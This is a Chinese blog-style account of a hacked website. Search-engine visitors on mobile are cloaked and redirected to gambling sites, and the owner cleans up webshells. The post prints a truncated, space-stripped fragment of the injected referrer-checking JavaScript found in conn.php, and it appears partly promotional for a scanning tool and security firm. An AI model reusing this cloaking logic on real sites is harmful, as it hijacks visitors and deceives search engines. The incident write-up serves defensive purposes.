訪問站點只要后面目錄帶apk(不管是文件還是目錄),就會判斷請求頭,如果為手機移動端的請求頭,就會跳轉到*網站,如果是電腦PC瀏覽器,就會彈空白頁訪問站點,讓你看不到跳轉后的網址,只要域名后面地址帶apk(不管是文件還是目錄),就會判斷請求頭,如果為手機移動端的請求頭,就會跳轉bc網站,如果是電腦瀏覽器,就會彈空白頁,最近也加上客戶訂單越來越少,領導也是著急,很大一部分客戶渠道來源都從百度點擊來的,靜下心來看看網站到底是怎么回事,不看不要緊,簡直嚇我一跳。網站在百度里的收錄增加許多,本來以為是更新的文章導致的,可是仔細一想也沒那么多的收錄呀,site:網站,點擊到十頁以后竟然發(fā)現了問題的關鍵,百度收錄了一大堆我們網站沒有的URL鏈接,復制那個我們域名的鏈接,提示不存在,從百度收錄點進去跳轉到BC網站。
排查過程
最初判斷可能是修改了js文件,但經過長時間的瀏覽,文件內容搜索等等該用上的技能都用上了,頭皮都發(fā)麻了,翻了2個小時,都沒有發(fā)現js修改的一點痕跡,而且發(fā)現這個服務器的所有站點都有這個問題,看起來事情并不簡單,現在的當務之急是盡快解決這個問題,否則影響太大。通過服務器的SINESAFE木馬查殺工具,查殺出多個變形的webshell,以及隱藏屬性無法刪除的木馬文件,本地掃描兩個上傳文件,火絨均報毒。
我這才明白過來,原來是我網站被黑了。趕緊打開服務器里的各個站點,下載網站程序代碼到本地,然后挨個對每一個代碼進行查看,查看是不是網站被黑客植入了木馬后門,果不其然在每個網站根目錄里的conn.php發(fā)現了黑客插入的惡意代碼:
functiongo_bots_url(){varinit_flag="apk",bct=document.referrer,bot=['baidu','google','yahoo','bing','soso','sogou','#','so.com','youdao','anquan','sm.cn'];//,'haosou'];for(variinbot){if(bct.indexOf(bot[i])!=-1){init_flag="apk";
去除掉惡意代碼后,網站從百度搜索點擊進來的也正常顯示了,真是太*了,在服務器中查看隱藏屬性的文件普通肉眼是看不到的,需要用專門的SINESAFE木馬查殺工具才能看到,怪不得我找了大半天都沒找到問題根源。接下來的工作就是抓緊修復網站漏洞,以及對服務器上的所有站點進行排查和漏洞修復,防止被再次攻擊跳轉,如果大家對程序代碼不太熟悉無法修復漏洞的話可以到網站安全公司去看看。
申請創(chuàng)業(yè)報道,分享創(chuàng)業(yè)好點子。點擊此處,共同探討創(chuàng)業(yè)新機遇!